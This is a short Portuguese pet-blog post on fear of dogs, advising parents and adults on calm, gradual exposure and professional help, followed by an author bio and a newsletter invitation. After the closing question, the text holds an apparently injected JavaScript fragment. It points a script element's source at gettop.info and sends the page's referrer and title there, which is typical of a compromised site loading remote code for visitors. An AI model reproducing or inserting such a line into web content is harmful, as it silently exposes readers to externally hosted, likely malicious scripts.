Medo de cães??

Nídia Teiga Cães, Comportamento 0 Comments

Fonte: Thomas Paal

Existem várias pessoas que têm medo de cães e quando confrontados com um chegam mesmo a bloquear dada a ansiedade.

Este medo causa nervosismo tanto na pessoa em questão como nos próprios donos o que por sua vez passa ao animal.

Crianças com medo, o que fazer?

No caso das crianças por vezes é normal que estas sintam medo dos cães, pois estes são invasivos, maiores que eles e “desconhecidos”. Os pais devem então lidar com esta situação de forma calma sem pressionar as crianças e ir apresentando diversas situações que incluam animais, como a ida a uma loja de animais, filmes com cães, etc.

Nunca se deve forçar uma criança a dar festas a um cão, esta deve fazê-lo apenas quando se sentir segura. Parte superior do formulário

Adultos com medo, o que fazer?

Este medo tem tratamento e tal como nas crianças, os adultos não devem ser pressionados para se familiarizarem com os cães. Este medo pode ser diagnosticado por um profissional, como psicólogo, psiquiatra, etc.

É possível fazer algumas sessões para acabar com este medo e desta forma ter uma vida social mais saudável.

Já passou por esta situação?footer._s5vm9s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Apaixonada por animais e o seu melhor amigo é o Dallas, um Boxer muito querido e louco para a brincadeira. Blogger e Community Manager da Love Pet Food. Licenciada em Economia na Nova School of Business and Economics e mestre em Marketing pelo ISCTE Business School.

Junte-se a milhares de pet lovers e receba a nossa newsletter patuda.

Todas as semanas enviamos a nossa newsletter cheia de dicas, notícias e videos divertidos. Não perca nada e subscreva!